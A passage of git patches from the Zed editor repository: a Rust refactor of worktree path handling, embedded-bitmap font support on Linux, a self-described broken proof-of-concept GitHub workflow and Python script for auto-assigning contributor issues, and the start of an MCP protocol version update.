&update.original_repo_abs_path { - self.snapshot.original_repo_abs_path = Path::new(main_path.as_str()).into(); + if let Some(repository_dir_abs_path) = &update.repository_dir_abs_path { + self.snapshot.repository_dir_abs_path = + Path::new(repository_dir_abs_path.as_str()).into(); + } + if let Some(common_dir_abs_path) = &update.common_dir_abs_path { + self.snapshot.common_dir_abs_path = Path::new(common_dir_abs_path.as_str()).into(); } let new_branch = update.branch_summary.as_ref().map(proto_to_branch); @@ -7793,7 +7847,7 @@ pub async fn resolve_git_worktree_to_main_repo(fs: &dyn Fs, path: &Path) -> Opti /// /// Returns `Ok(resolved_path)` or an error with a user-facing message. pub fn worktrees_directory_for_repo( - original_repo_abs_path: &Path, + repository_anchor_path: &Path, worktree_directory_setting: &str, ) -> Result { // Check the original setting before trimming, since a path like "///" @@ -7819,25 +7873,25 @@ pub fn worktrees_directory_for_repo( anyhow::bail!("git.worktree_directory must not be \"..\" (use \"../some-name\" instead)"); } - let joined = original_repo_abs_path.join(trimmed); + let joined = repository_anchor_path.join(trimmed); let resolved = util::normalize_path(&joined); - let resolved = if resolved.starts_with(original_repo_abs_path) { + let resolved = if resolved.starts_with(repository_anchor_path) { resolved - } else if let Some(repo_dir_name) = original_repo_abs_path.file_name() { + } else if let Some(repo_dir_name) = repository_anchor_path.file_name() { resolved.join(repo_dir_name) } else { resolved }; - let parent = original_repo_abs_path + let parent = repository_anchor_path .parent() - .unwrap_or(original_repo_abs_path); + .unwrap_or(repository_anchor_path); if !resolved.starts_with(parent) { anyhow::bail!( "git.worktree_directory resolved to {resolved:?}, which is outside \ the project root and its parent directory. It must resolve to a \ - subdirectory of {original_repo_abs_path:?} or a sibling of it." 
+ subdirectory of {repository_anchor_path:?} or a sibling of it." ); } @@ -7884,6 +7938,29 @@ async fn remove_empty_managed_worktree_ancestors(fs: &dyn Fs, child_path: &Path, } } +/// Returns the repository's identity path given its common Git directory. +/// +/// This is the canonical, on-disk path used for project grouping and as the +/// basis for display names. The goal is to return the directory the user +/// thinks of as "the project": +/// +/// - If `common_dir`'s last component starts with `.` (e.g. `.git` for a +/// normal checkout, or `.bare` for a bare clone), the parent directory is +/// returned. Both of these are internal Git directories; the parent is the +/// meaningful project root. +/// - Otherwise (e.g. `zed.git` for a bare clone), `common_dir` itself is +/// returned — it is already a meaningful on-disk path. +pub fn repo_identity_path(common_dir: &Path) -> &Path { + let is_dot_entry = common_dir + .file_name() + .is_some_and(|n| n.to_string_lossy().starts_with('.')); + if is_dot_entry { + common_dir.parent().unwrap_or(common_dir) + } else { + common_dir + } +} + /// Returns a short name for a linked worktree suitable for UI display /// /// Uses the main worktree path to come up with a short name that disambiguates diff --git a/crates/project/src/project.rs b/crates/project/src/project.rs index af15ab445175e5..7cb51d4ef8a41c 100644 --- a/crates/project/src/project.rs +++ b/crates/project/src/project.rs @@ -49,7 +49,7 @@ pub use agent_server_store::{AgentId, AgentServerStore, AgentServersUpdated, Ext pub use git_store::{ ConflictRegion, ConflictSet, ConflictSetSnapshot, ConflictSetUpdate, git_traversal::{ChildEntriesGitIter, GitEntry, GitEntryRef, GitTraversal}, - linked_worktree_short_name, worktrees_directory_for_repo, + linked_worktree_short_name, repo_identity_path, worktrees_directory_for_repo, }; pub use manifest_tree::ManifestTree; pub use project_search::{Search, SearchResults}; @@ -6204,7 +6204,14 @@ impl ProjectGroupKey { let mut names 
= Vec::with_capacity(self.paths.paths().len()); for abs_path in self.paths.ordered_paths() { let detail = path_detail_map.get(abs_path).copied().unwrap_or(0); - let suffix = path_suffix(abs_path, detail); + // Strip a `.git` extension for display (bare clones like `foo.git` + // should display as `foo`, matching the titlebar). + let display_path = if abs_path.extension() == Some(std::ffi::OsStr::new("git")) { + std::borrow::Cow::Owned(abs_path.with_extension("")) + } else { + std::borrow::Cow::Borrowed(abs_path.as_path()) + }; + let suffix = path_suffix(&display_path, detail); if !suffix.is_empty() { names.push(suffix); } diff --git a/crates/project/src/worktree_store.rs b/crates/project/src/worktree_store.rs index 8eaf3f40c0a7b7..c6abb6e1743540 100644 --- a/crates/project/src/worktree_store.rs +++ b/crates/project/src/worktree_store.rs @@ -1369,7 +1369,7 @@ impl WorktreeStore { let folder_path = snapshot.abs_path().to_path_buf(); let main_path = snapshot .root_repo_common_dir() - .and_then(|dir| Some(dir.parent()?.to_path_buf())) + .map(|dir| crate::git_store::repo_identity_path(dir).to_path_buf()) .unwrap_or_else(|| folder_path.clone()); (main_path, folder_path) }) diff --git a/crates/project/tests/integration/git_store.rs b/crates/project/tests/integration/git_store.rs index 766e41b100dc8b..2aaeb901d54b5b 100644 --- a/crates/project/tests/integration/git_store.rs +++ b/crates/project/tests/integration/git_store.rs @@ -1609,7 +1609,10 @@ mod trust_tests { mod resolve_worktree_tests { use fs::FakeFs; use gpui::TestAppContext; - use project::{git_store::resolve_git_worktree_to_main_repo, linked_worktree_short_name}; + use project::{ + git_store::resolve_git_worktree_to_main_repo, linked_worktree_short_name, + repo_identity_path, + }; use serde_json::json; use std::path::{Path, PathBuf}; @@ -1687,6 +1690,27 @@ mod resolve_worktree_tests { assert_eq!(result, None); } + #[test] + fn test_repo_identity_path() { + let examples = [ + // Normal checkout: `.git` starts 
with `.`, so parent is the worktree + ("/home/bob/zed/.git", "/home/bob/zed"), + // Bare clone named `.bare`: starts with `.`, so parent is the project dir + ("/repos/project/.bare", "/repos/project"), + // Bare clone with `.git` extension: does not start with `.`, kept as-is + ("/repos/zed.git", "/repos/zed.git"), + // Bare clone with arbitrary plain name: kept as-is + ("/repos/project", "/repos/project"), + ]; + for (common_dir, expected) in examples { + assert_eq!( + repo_identity_path(Path::new(common_dir)), + Path::new(expected), + "identity path for common_dir {common_dir:?} should be {expected:?}" + ); + } + } + #[test] fn test_linked_worktree_short_name() { let examples = [ diff --git a/crates/project/tests/integration/project_tests.rs b/crates/project/tests/integration/project_tests.rs index c512c893cc4551..0fbec6c1a1d4ea 100644 --- a/crates/project/tests/integration/project_tests.rs +++ b/crates/project/tests/integration/project_tests.rs @@ -12068,8 +12068,8 @@ async fn test_git_worktrees_and_submodules(cx: &mut gpui::TestAppContext) { Path::new(path!("/project/some-worktree")).into(), ); pretty_assertions::assert_eq!( - repo.read(cx).original_repo_abs_path, - Path::new(path!("/project")).into(), + repo.read(cx).main_worktree_abs_path(), + Some(Path::new(path!("/project"))), ); assert!( repo.read(cx).linked_worktree_path().is_some(), @@ -12121,8 +12121,8 @@ async fn test_git_worktrees_and_submodules(cx: &mut gpui::TestAppContext) { Path::new(path!("/project/subdir/some-submodule")).into(), ); pretty_assertions::assert_eq!( - repo.read(cx).original_repo_abs_path, - Path::new(path!("/project/subdir/some-submodule")).into(), + repo.read(cx).main_worktree_abs_path(), + Some(Path::new(path!("/project/subdir/some-submodule"))), ); assert!( repo.read(cx).linked_worktree_path().is_none(), diff --git a/crates/proto/proto/git.proto b/crates/proto/proto/git.proto index 3c0db6b1a638e9..9d583a166c95f7 100644 --- a/crates/proto/proto/git.proto +++ 
b/crates/proto/proto/git.proto @@ -125,9 +125,11 @@ message UpdateRepository { repeated StashEntry stash_entries = 13; optional string remote_upstream_url = 14; optional string remote_origin_url = 15; - optional string original_repo_abs_path = 16; + reserved 16; repeated Worktree linked_worktrees = 17; repeated Branch branch_list = 18; + optional string repository_dir_abs_path = 19; + optional string common_dir_abs_path = 20; } message RemoveRepository { diff --git a/crates/sidebar/src/sidebar.rs b/crates/sidebar/src/sidebar.rs index 12df8a7f1cba14..57b7c9b2cbb238 100644 --- a/crates/sidebar/src/sidebar.rs +++ b/crates/sidebar/src/sidebar.rs @@ -383,11 +383,12 @@ fn workspace_menu_worktree_labels( if let Some(snapshot) = repository_snapshot { let worktree_name = if snapshot.is_linked_worktree() { - project::linked_worktree_short_name( - snapshot.original_repo_abs_path.as_ref(), - root_path, - ) - .unwrap_or_else(|| folder_name.clone()) + snapshot + .main_worktree_abs_path() + .and_then(|main_worktree_path| { + project::linked_worktree_short_name(main_worktree_path, root_path) + }) + .unwrap_or_else(|| folder_name.clone()) } else { "main".into() }; @@ -5246,7 +5247,7 @@ fn dump_single_workspace(workspace: &Workspace, output: &mut String, cx: &gpui:: .find(|snapshot| abs_path.starts_with(&*snapshot.work_directory_abs_path)); let is_linked = repo_info.map(|s| s.is_linked_worktree()).unwrap_or(false); - let original_repo_path = repo_info.map(|s| &s.original_repo_abs_path); + let main_worktree_path = repo_info.and_then(|s| s.main_worktree_abs_path()); let branch = repo_info.and_then(|s| s.branch.as_ref().map(|b| b.ref_name.clone())); write!(output, " - {}", abs_path.display()).ok(); @@ -5257,8 +5258,13 @@ fn dump_single_workspace(workspace: &Workspace, output: &mut String, cx: &gpui:: write!(output, " [branch: {branch}]").ok(); } if is_linked { - if let Some(original) = original_repo_path { - write!(output, " [linked worktree -> {}]", original.display()).ok(); + if let 
Some(main_worktree_path) = main_worktree_path { + write!( + output, + " [linked worktree -> {}]", + main_worktree_path.display() + ) + .ok(); } else { write!(output, " [linked worktree]").ok(); } diff --git a/crates/sidebar/src/sidebar_tests.rs b/crates/sidebar/src/sidebar_tests.rs index b2f9e6ac1ae442..3747a7a4d3940d 100644 --- a/crates/sidebar/src/sidebar_tests.rs +++ b/crates/sidebar/src/sidebar_tests.rs @@ -9692,8 +9692,10 @@ mod property_test { for workspace in group_workspaces { for snapshot in root_repository_snapshots(workspace, cx) { - let repo_path_list = - PathList::new(&[snapshot.original_repo_abs_path.to_path_buf()]); + let Some(main_worktree_abs_path) = snapshot.main_worktree_abs_path() else { + continue; + }; + let repo_path_list = PathList::new(&[main_worktree_abs_path.to_path_buf()]); if repo_path_list != path_list { continue; } diff --git a/crates/title_bar/src/title_bar.rs b/crates/title_bar/src/title_bar.rs index 988c8a7c6f492e..02a0c1bcf78129 100644 --- a/crates/title_bar/src/title_bar.rs +++ b/crates/title_bar/src/title_bar.rs @@ -14,7 +14,7 @@ pub use platform_title_bar::{ self, DraggedWindowTab, MergeAllWindows, MoveTabToNewWindow, PlatformTitleBar, ShowNextWindowTab, ShowPreviousWindowTab, }; -use project::linked_worktree_short_name; +use project::{linked_worktree_short_name, repo_identity_path}; #[cfg(not(target_os = "macos"))] use crate::application_menu::{ @@ -197,16 +197,27 @@ impl Render for TitleBar { .map(|name| SharedString::from(name.to_string())); if let Some(repo) = &repository { let repo = repo.read(cx); - linked_worktree_name = linked_worktree_short_name( - repo.original_repo_abs_path.as_ref(), - repo.work_directory_abs_path.as_ref(), - ); - if let Some(name) = repo - .original_repo_abs_path - .file_name() - .and_then(|name| name.to_str()) - { - project_name = Some(SharedString::from(name.to_string())); + linked_worktree_name = repo + .main_worktree_abs_path() + .and_then(|main_worktree_path| { + linked_worktree_short_name( + 
main_worktree_path, + repo.work_directory_abs_path.as_ref(), + ) + }) + .or_else(|| { + repo.is_linked_worktree() + .then_some(project_name.clone()) + .flatten() + }); + let identity = repo_identity_path(&repo.common_dir_abs_path); + let display_name = if identity.extension() == Some(std::ffi::OsStr::new("git")) { + identity.file_stem() + } else { + identity.file_name() + }; + if let Some(name) = display_name.and_then(|n| n.to_str()) { + project_name = Some(name.into()); } } } From b7aad957cf71b3cfeeb859d198b4cf0b4f5f62f2 Mon Sep 17 00:00:00 2001 From: John Tur Date: Wed, 29 Apr 2026 15:23:13 +0200 Subject: [PATCH 109/231] Use embedded bitmaps in fonts on Linux (#55202) Release Notes: - Added support for using embedded bitmaps in fonts on Linux --- crates/gpui_wgpu/src/cosmic_text_system.rs | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/crates/gpui_wgpu/src/cosmic_text_system.rs b/crates/gpui_wgpu/src/cosmic_text_system.rs index c664ca9449ff21..24fa7172c3ab3f 100644 --- a/crates/gpui_wgpu/src/cosmic_text_system.rs +++ b/crates/gpui_wgpu/src/cosmic_text_system.rs @@ -302,7 +302,15 @@ impl CosmicTextSystemState { } Ok((bitmap_size, image.data)) } - swash::scale::image::Content::Mask => Ok((bitmap_size, image.data)), + swash::scale::image::Content::Mask => { + if params.subpixel_rendering { + // We must always return RGBA data when subpixel rendering is requested. 
+ let expanded = image.data.iter().flat_map(|&a| [a, a, a, a]).collect(); + Ok((bitmap_size, expanded)) + } else { + Ok((bitmap_size, image.data)) + } + } } } @@ -333,7 +341,7 @@ impl CosmicTextSystemState { Source::Outline, ] } else { - &[Source::Outline] + &[Source::Bitmap(StrikeWith::ExactSize), Source::Outline] }; let mut renderer = Render::new(sources); From f3d6b749d67f94052510de0149cd8166726fd84b Mon Sep 17 00:00:00 2001 From: Lena <241371603+zelenenka@users.noreply.github.com> Date: Wed, 29 Apr 2026 15:59:31 +0200 Subject: [PATCH 110/231] Add a broken POC for guild auto-assignment (#55205) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This is mostly to enable testing the github action with the right secrets — the code is atrocious for now. Release notes: - N/A --- .../workflows/assign_contributor_issue.yml | 70 +++ script/github-assign-contributor-issue.py | 421 ++++++++++++++++++ 2 files changed, 491 insertions(+) create mode 100644 .github/workflows/assign_contributor_issue.yml create mode 100644 script/github-assign-contributor-issue.py diff --git a/.github/workflows/assign_contributor_issue.yml b/.github/workflows/assign_contributor_issue.yml new file mode 100644 index 00000000000000..5e968611299e26 --- /dev/null +++ b/.github/workflows/assign_contributor_issue.yml @@ -0,0 +1,70 @@ +# Assign Contributor Issue — auto-assign labeled contributor issues +# +# When an issue has both a `.contrib/good *` label and an `area:` label, +# finds the least-busy contributor interested in that area (via Tally form +# responses), assigns the issue, updates the project board, and notifies +# the contributor on Slack. +# +# Errors and "no candidates" conditions are reported to the Slack activity +# channel. 
+ +name: Assign Contributor Issue + +on: + issues: + types: [labeled] + workflow_dispatch: + inputs: + issue_number: + description: "Issue number to test against" + required: true + type: number + +permissions: + contents: read + +concurrency: + group: assign-contributor-${{ github.event.issue.number || inputs.issue_number }} + cancel-in-progress: true + +jobs: + assign-contributor: + if: >- + github.event_name == 'workflow_dispatch' || + (github.repository == 'zed-industries/zed' && + github.event.issue.state == 'open' && + (startsWith(github.event.label.name, '.contrib/good ') || startsWith(github.event.label.name, 'area:'))) + runs-on: namespace-profile-2x4-ubuntu-2404 + timeout-minutes: 5 + + steps: + - name: Generate app token + id: app-token + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 # v3.0.0 + with: + app-id: ${{ secrets.ZED_COMMUNITY_BOT_APP_ID }} + private-key: ${{ secrets.ZED_COMMUNITY_BOT_PRIVATE_KEY }} + owner: zed-industries + + - name: Checkout repository + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 + with: + sparse-checkout: script/github-assign-contributor-issue.py + sparse-checkout-cone-mode: false + + - name: Set up Python + uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5.6.0 + with: + python-version: "3.12" + + - name: Install dependencies + run: pip install requests + + - name: Assign contributor + env: + GITHUB_TOKEN: ${{ steps.app-token.outputs.token }} + TALLY_API_KEY: ${{ secrets.TALLY_API_KEY }} + TALLY_FORM_ID: ${{ vars.TALLY_CONTRIBUTOR_FORM_ID }} + SLACK_BOT_TOKEN: ${{ secrets.SLACK_CONTRIBUTOR_BOT_TOKEN }} + ISSUE_NUMBER: ${{ github.event.issue.number || inputs.issue_number }} + run: python script/github-assign-contributor-issue.py "$ISSUE_NUMBER" diff --git a/script/github-assign-contributor-issue.py b/script/github-assign-contributor-issue.py new file mode 100644 index 00000000000000..5b48b46a3df8a3 --- /dev/null +++ 
b/script/github-assign-contributor-issue.py @@ -0,0 +1,421 @@ +#!/usr/bin/env python3 +""" +Assign a labeled contributor issue to the least-busy interested contributor. + +When an issue has both a `.contrib/good *` label and an `area:` label, this +script: +1. Fetches Tally form responses to find contributors interested in the issue's areas +2. Queries GitHub for each candidate's current open issue assignment count +3. Assigns the issue to the least-busy candidate (random tiebreak) +4. Adds the issue to a GitHub project board with "Assigned" status +5. Notifies the assignee via Slack DM and posts to an activity channel + +Errors and notable conditions (no candidates found, API failures) are reported +to the Slack activity channel before the script exits. + +Requires: + requests (pip install requests) + +Usage: + python github-assign-contributor-issue.py ISSUE_NUMBER + +""" + +import json +import os +import random +import sys + +import requests + +GITHUB_API = "https://api.github.com" +TALLY_API = "https://api.tally.so" +SLACK_API = "https://slack.com/api" + +REPO_OWNER = "zed-industries" +REPO_NAME = "zed" +PROJECT_NUMBER = 83 +SLACK_ACTIVITY_CHANNEL_ID = "C0B0JCE8GDC" + + +def eligible_areas(issue): + """Returns the list of area names if the issue is eligible for assignment, or None.""" + labels = [label["name"] for label in issue["labels"]] + assignees = [a["login"] for a in issue["assignees"]] + + contrib_labels = [name for name in labels if name.startswith(".contrib/good ")] + area_labels = [name for name in labels if name.startswith("area:")] + + if not contrib_labels or not area_labels: + print("Issue needs both a .contrib/good * label and an area: label, skipping") + return None + + if assignees: + print(f"Issue is already assigned to {assignees}, skipping") + return None + + areas = [label.removeprefix("area:") for label in area_labels] + print(f"Areas: {areas}") + return areas + + +# --- Tally --- + + +def fetch_tally_contributors(api_key, form_id): + """Fetch all
completed submissions from a Tally form. + + Deduplicates by GitHub username, keeping the latest submission. + """ + headers = {"Authorization": f"Bearer {api_key}"} + contributors = {} + page = 1 + + while True: + response = requests.get( + f"{TALLY_API}/forms/{form_id}/submissions", + headers=headers, + params={"page": page, "limit": 500, "filter": "completed"}, + ) + response.raise_for_status() + data = response.json() + + field_titles = {} + for question in data.get("questions", []): + for field in question.get("fields", []): + field_titles[field["uuid"]] = field.get("title", "") + + questions = {q["id"]: q for q in data.get("questions", [])} + + for submission in data.get("submissions", []): + record = parse_submission(submission, questions, field_titles) + if record: + contributors[record["github_username"].lower()] = record + + if not data.get("hasMore", False): + break + page += 1 + + return list(contributors.values()) + + +def parse_submission(submission, questions, field_titles): + """Parse a single Tally submission into a contributor record. + + Returns a dict with github_username, email (optional), and areas, + or None if the submission is incomplete. 
+ """ + github_username = None + email = None + areas = [] + + for response in submission.get("responses", []): + try: + question_title = questions[response["questionId"]]["title"].lower() + answer = response["answer"] + except KeyError: + continue + + try: + if "github" in question_title: + github_username = str(answer).strip().lstrip("@") + elif "email" in question_title: + email = str(answer).strip().lower() + elif "area" in question_title: + for item in answer if isinstance(answer, list) else [answer]: + area = field_titles.get(item, item).strip() + if area: + areas.append(area) + except (TypeError, AttributeError): + continue + + if not github_username or not areas: + return None + + record = {"github_username": github_username, "areas": areas} + if email: + record["email"] = email + return record + + +def find_candidates(contributors, area_names): + """Find contributors interested in any of the given areas (case-insensitive).""" + target = {name.lower() for name in area_names} + return [c for c in contributors if any(a.lower() in target for a in c["areas"])] + + +def pick_least_busy(github_headers, candidates): + """Pick the candidate with the fewest open assignments (random tiebreak).""" + usernames = [c["github_username"] for c in candidates] + loads = count_open_assignments(github_headers, usernames) + for username, count in loads.items(): + print(f" {username}: {count} open assignments") + + min_load = min(loads.values()) + least_busy = [c for c in candidates if loads[c["github_username"]] == min_load] + chosen = random.choice(least_busy) + print( + f"Selected: {chosen['github_username']} (load: {min_load}, {len(least_busy)} tied)" + ) + return chosen + + +# --- GitHub --- + + +def fetch_issue(headers, issue_number): + """Fetch issue details from the GitHub API.""" + response = requests.get( + f"{GITHUB_API}/repos/{REPO_OWNER}/{REPO_NAME}/issues/{issue_number}", + headers=headers, + ) + response.raise_for_status() + return response.json() + + +def 
count_open_assignments(headers, usernames): + """Count open issues assigned to each user in a single GraphQL request.""" + aliases = [ + f'u{i}: search(query: "repo:{REPO_OWNER}/{REPO_NAME} is:issue is:open assignee:{name}", type: ISSUE) {{ issueCount }}' + for i, name in enumerate(usernames) + ] + query = "query {\n" + "\n".join(aliases) + "\n}" + data = execute_graphql(headers, query, {}) + return {name: data[f"u{i}"]["issueCount"] for i, name in enumerate(usernames)} + + +def assign_issue(headers, issue_number, username): + """Assign a GitHub issue to a user.""" + response = requests.post( + f"{GITHUB_API}/repos/{REPO_OWNER}/{REPO_NAME}/issues/{issue_number}/assignees", + headers=headers, + json={"assignees": [username]}, + ) + response.raise_for_status() + + +def execute_graphql(headers, query, variables): + """Execute a GitHub GraphQL query. Raises on HTTP or GraphQL errors.""" + response = requests.post( + f"{GITHUB_API}/graphql", + headers=headers, + json={"query": query, "variables": variables}, + ) + response.raise_for_status() + result = response.json() + if "errors" in result: + raise RuntimeError(f"GraphQL error: {result['errors']}") + return result["data"] + + +def fetch_project(headers, project_number): + """Fetch a GitHub project board's metadata including fields and status options.""" + data = execute_graphql( + headers, + """ + query($owner: String!, $number: Int!) { + organization(login: $owner) { + projectV2(number: $number) { + id + fields(first: 50) { + nodes { + ... on ProjectV2SingleSelectField { + id + name + options { id name } + } + } + } + } + } + } + """, + {"owner": REPO_OWNER, "number": project_number}, + ) + return data["organization"]["projectV2"] + + +def add_issue_to_project(headers, project_id, issue_node_id): + """Add an issue to a GitHub project board. Returns the project item ID.""" + data = execute_graphql( + headers, + """ + mutation($projectId: ID!, $contentId: ID!) 
{ + addProjectV2ItemById(input: {projectId: $projectId, contentId: $contentId}) { + item { id } + } + } + """, + {"projectId": project_id, "contentId": issue_node_id}, + ) + item_id = data["addProjectV2ItemById"]["item"]["id"] + print(f"Added issue to project (item: {item_id})") + return item_id + + +def set_project_item_status(headers, project, item_id, status_name): + """Set the Status field on a project item. Hard-fails if the status option is missing.""" + status_field_id = None + option_id = None + for field in project["fields"]["nodes"]: + if field.get("name") == "Status": + status_field_id = field["id"] + for option in field.get("options", []): + if option["name"] == status_name: + option_id = option["id"] + break + break + + if not status_field_id or not option_id: + available = [f.get("name") for f in project["fields"]["nodes"] if f.get("name")] + raise RuntimeError( + f"Could not find Status field with '{status_name}' option. " + f"Fields found: {available}" + ) + + execute_graphql( + headers, + """ + mutation($projectId: ID!, $itemId: ID!, $fieldId: ID!, $optionId: String!) { + updateProjectV2ItemFieldValue(input: { + projectId: $projectId + itemId: $itemId + fieldId: $fieldId + value: { singleSelectOptionId: $optionId } + }) { + projectV2Item { id } + } + } + """, + { + "projectId": project["id"], + "itemId": item_id, + "fieldId": status_field_id, + "optionId": option_id, + }, + ) + print(f"Set project status to '{status_name}'") + + +# --- Slack --- + + +def slack_post_message(headers, recipient, text): + """Post a message to a Slack channel or user DM.""" + response = requests.post( + f"{SLACK_API}/chat.postMessage", + headers=headers, + json={"channel": recipient, "text": text}, + ) + response.raise_for_status() + data = response.json() + if not data["ok"]: + raise RuntimeError(f"Slack API error: {data['error']}") + + +def find_slack_user_id(headers, email): + """Look up a Slack user ID by email. 
Returns None if not found.""" + try: + response = requests.get( + f"{SLACK_API}/users.lookupByEmail", + headers=headers, + params={"email": email}, + ) + response.raise_for_status() + return response.json()["user"]["id"] + except (requests.RequestException, KeyError): + return None + + +def post_to_activity(slack_headers, message): + """Best-effort post to the Slack activity channel.""" + try: + slack_post_message(slack_headers, SLACK_ACTIVITY_CHANNEL_ID, message) + except Exception as exc: + print(f"Failed to post to Slack activity channel: {exc}") + + +def notify_assignment(slack_headers, chosen, issue): + """DM the chosen contributor and post to the activity channel.""" + issue_number = issue["number"] + issue_title = issue["title"] + issue_url = issue["html_url"] + chosen_username = chosen["github_username"] + + slack_user_id = find_slack_user_id(slack_headers, chosen.get("email")) + + if slack_user_id: + slack_post_message( + slack_headers, + slack_user_id, + f"\U0001f44b You've been assigned to <{issue_url}|#{issue_number}: {issue_title}>! " + f"This issue matches your areas of interest. 
" + f"Let us know if you have any questions.", + ) + + activity_message = ( + f"\U0001f4cb <{issue_url}|#{issue_number}: {issue_title}> " + f"assigned to *{chosen_username}*" + ) + if slack_user_id: + activity_message += f" (<@{slack_user_id}>)" + post_to_activity(slack_headers, activity_message) + + +# --- Main --- + + +if __name__ == "__main__": + issue_number = sys.argv[1] + + github_token = os.environ["GITHUB_TOKEN"] + tally_api_key = os.environ["TALLY_API_KEY"] + tally_form_id = os.environ["TALLY_FORM_ID"] + slack_bot_token = os.environ["SLACK_CONTRIBUTOR_ROUTING_BOT_TOKEN"] + + github_headers = { + "Authorization": f"Bearer {github_token}", + "Accept": "application/vnd.github+json", + "X-GitHub-Api-Version": "2022-11-28", + } + slack_headers = { + "Authorization": f"Bearer {slack_bot_token}", + "Content-Type": "application/json", + } + + issue = fetch_issue(github_headers, issue_number) + if not (areas := eligible_areas(issue)): + sys.exit(0) + + try: + contributors = fetch_tally_contributors(tally_api_key, tally_form_id) + print(f"Found {len(contributors)} contributors in Tally") + + candidates = find_candidates(contributors, areas) + if not candidates: + post_to_activity( + slack_headers, + f"\u26a0\ufe0f No contributors found for {', '.join(areas)} \u2014 " + f"<{issue['html_url']}|#{issue_number}: {issue['title']}>", + ) + print(f"No contributors interested in areas: {areas}") + sys.exit(0) + + chosen = pick_least_busy(github_headers, candidates) + + assign_issue(github_headers, issue_number, chosen["github_username"]) + print(f"Assigned #{issue_number} to {chosen['github_username']}") + + project = fetch_project(github_headers, PROJECT_NUMBER) + item_id = add_issue_to_project(github_headers, project["id"], issue["node_id"]) + set_project_item_status(github_headers, project, item_id, "Assigned") + + notify_assignment(slack_headers, chosen, issue) + + except Exception as exc: + post_to_activity( + slack_headers, + f"\u274c Failed to assign contributor for 
" + f"<{issue['html_url']}|#{issue_number}: {issue['title']}>: {exc}", + ) + raise From 28897fa05a001d3612c86d1cd6306aab51989af4 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Wed, 29 Apr 2026 18:29:48 +0200 Subject: [PATCH 111/231] Support latest MCP protocol version (#54494) Updates our MCP implementation to support `2025-06-18` and `2025-11-25` Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #54458, #53456 Release Notes: - Support latest MCP version (`2025-11-25`) --- crates/agent/src/tests/mod.rs | 15 +++++ .../src/tools/context_server_registry.rs | 3 + crates/context_server/src/client.rs | 7 +++ crates/context_server/src/context_server.rs | 2 + crates/context_server/src/listener.rs | 1 + crates/context_server/src/protocol.rs | 7 +++ crates/context_server/src/test.rs | 2 + crates/context_server/src/transport.rs | 5 ++ crates/context_server/src/transport/http.rs | 30 ++++++++++ crates/context_server/src/types.rs | 55 ++++++++++++++++++- 10 files changed, 126 insertions(+), 1 deletion(-) diff --git a/crates/agent/src/tests/mod.rs b/crates/agent/src/tests/mod.rs index 996e753952b6cb..d9f451f135d6bf 100644 --- a/crates/agent/src/tests/mod.rs +++ b/crates/agent/src/tests/mod.rs @@ -1457,6 +1457,7 @@ async fn test_mcp_tools(cx: &mut TestAppContext) { "test_server", vec![context_server::types::Tool { name: "echo".into(), + title: None, description: None, input_schema: serde_json::to_value(EchoTool::input_schema( LanguageModelToolSchemaFormat::JsonSchema, @@ -1621,6 +1622,7 @@ async fn test_mcp_tool_multi_content_response(cx: &mut TestAppContext) { "screenshot_server", vec![context_server::types::Tool { name: 
"screenshot".into(), + title: None, description: None, input_schema: json!({"type": "object", "properties": {}}), output_schema: None, @@ -1742,6 +1744,7 @@ async fn test_mcp_tool_result_displayed_when_server_disconnected(cx: &mut TestAp "github_server", vec![context_server::types::Tool { name: "issue_read".into(), + title: None, description: Some("Read a GitHub issue".into()), input_schema: json!({ "type": "object", @@ -1936,6 +1939,7 @@ async fn test_mcp_tool_truncation(cx: &mut TestAppContext) { vec![ context_server::types::Tool { name: "echo".into(), // Conflicts with native EchoTool + title: None, description: None, input_schema: serde_json::to_value(EchoTool::input_schema( LanguageModelToolSchemaFormat::JsonSchema, @@ -1946,6 +1950,7 @@ async fn test_mcp_tool_truncation(cx: &mut TestAppContext) { }, context_server::types::Tool { name: "unique_tool_1".into(), + title: None, description: None, input_schema: json!({"type": "object", "properties": {}}), output_schema: None, @@ -1961,6 +1966,7 @@ async fn test_mcp_tool_truncation(cx: &mut TestAppContext) { vec![ context_server::types::Tool { name: "echo".into(), // Also conflicts with native EchoTool + title: None, description: None, input_schema: serde_json::to_value(EchoTool::input_schema( LanguageModelToolSchemaFormat::JsonSchema, @@ -1971,6 +1977,7 @@ async fn test_mcp_tool_truncation(cx: &mut TestAppContext) { }, context_server::types::Tool { name: "unique_tool_2".into(), + title: None, description: None, input_schema: json!({"type": "object", "properties": {}}), output_schema: None, @@ -1978,6 +1985,7 @@ async fn test_mcp_tool_truncation(cx: &mut TestAppContext) { }, context_server::types::Tool { name: "a".repeat(MAX_TOOL_NAME_LENGTH - 2), + title: None, description: None, input_schema: json!({"type": "object", "properties": {}}), output_schema: None, @@ -1985,6 +1993,7 @@ async fn test_mcp_tool_truncation(cx: &mut TestAppContext) { }, context_server::types::Tool { name: "b".repeat(MAX_TOOL_NAME_LENGTH - 1), 
